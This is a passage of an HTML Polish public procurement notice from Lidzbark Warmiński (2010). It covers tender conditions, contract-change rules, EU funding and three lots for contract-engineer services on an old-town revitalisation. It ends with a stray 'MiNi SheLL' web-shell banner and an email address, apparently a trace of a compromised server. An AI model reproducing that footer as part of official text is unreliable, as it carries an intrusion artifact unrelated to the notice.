<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo(a) - w przypadku, gdy upoważnienie do podpisania oferty      
nie wynika bezpośrednio ze złożonego w ofercie odpisu z  właściwego rejestru,         w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia,     
    dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu 
    o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy 
    w sprawie niniejszego zamówienia publicznego</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiany w treści umowy w stosunku do treści oferty mogą być dokonane na skutek 
zaistnienia okoliczności niemożliwych wcześniej do przewidzenia, niezależnych od woli Stron, a w szczególności:
1) ustawowej zmiany stawek podatku VAT,
2) okoliczności niezależne od Wykonawcy uniemożliwiające realizację przedmiotu umowy w terminie, w tym:
a) zmiana zakresu nadzorowanych robót budowlanych, wystąpienie robót zamiennych    lub dodatkowych od wykonania których uzależnione jest wykonanie zamówienia  podstawowego, 
b) wystąpienie przestojów robót budowlanych spowodowanych koniecznością  
    usunięcia uszkodzeń istniejących sieci i urządzeń podziemnych, nieoznaczonych    w  dokumentacji projektowej lub wstrzymanie wykonania robót przez uprawnione  
    organy, z przyczyn niewynikających z winy Stron umowy, 
c) wystąpienie Siły Wyższej uniemożliwiającej realizację inwestycji.
3) wystąpienie okoliczności powodujących konieczność rezygnacji przez Zamawiającego 	z części zakresu robót realizowanych przez wykonawcę robót budowlanych w  ramach projektu, o którym  mowa w § 2 ust. 2, przykładowo gdy z powodu błędu dokumentacji projektowej nie zachodzi konieczność ich wykonania, ograniczenia lub 	przerwania dofinansowania realizacji inwestycji ze środków Unii 	Europejskiej	 w ramach Regionalnego Programu Operacyjnego 	Warmia i Mazury na 	lata 2007-	2013. W takich przypadkach wynagrodzenie Wykonawcy o którym mowa w §4 ust. 2 umowy zostanie pomniejszone przez zastosowanie procentu, o jaki zmniejszyła się wartość robót budowlanych</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://lidzbarkw-um.bip-wm.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Lidzbarku Warmińskim, 11-100 Lidzbark Warmiński, ul. A.Świętochowskiego 14, pok. nr 206.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.06.2010 godzina 12:00, miejsce: Urząd Miejski w Lidzbarku Warmińskim, 11-100 Lidzbark Warmiński, ul. A. Świętochowskiego 14, pok. nr 11.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt dofinansowany z Europejskiego Funduszu Rozwoju Regionalnego 
w ramach:
Osi Priorytetowej 4 - Rozwój, restrukturyzacja i rewitalizacja miast, Działanie 4.2 - Rewitalizacja miast Regionalnego Programu Operacyjnego Warmia i Mazury na lata 2007 - 2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pełnienie funkcji inżyniera kontraktu w projekcie pn.: Rewitalizacja 
  centrum starego miasta I etap - ul. Powstańców Warszawy, Plac Wolności, Ratuszowa, w okresie od dnia podpisania umowy do 30.06.2011 roku plus 36 miesięczny okres gwarancji jakości i okres rękojmi za wady zrealizowanego projektu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.54.10.00-2, 71.63.13.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pełnienie funkcji inżyniera kontraktu w projekcie pn.: Rewitalizacja centrum starego miasta I etap - Budynek po Urzędzie Miasta,  w okresie od dnia podpisania umowy do 30.06.2011 roku plus 36 miesięczny okres gwarancji jakości i okres rękojmi za wady zrealizowanego projektu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.54.10.00-2, 71.63.13.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie nr 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pełnienie funkcji inżyniera kontraktu w projekcie pn.: Rewitalizacja centrum starego miasta I etap - mury obronne, w okresie od dnia podpisania umowy do 30.06.2011 roku plus 36 miesięczny okres gwarancji jakości i okres rękojmi za wady zrealizowanego projektu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.54.10.00-2, 71.63.13.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com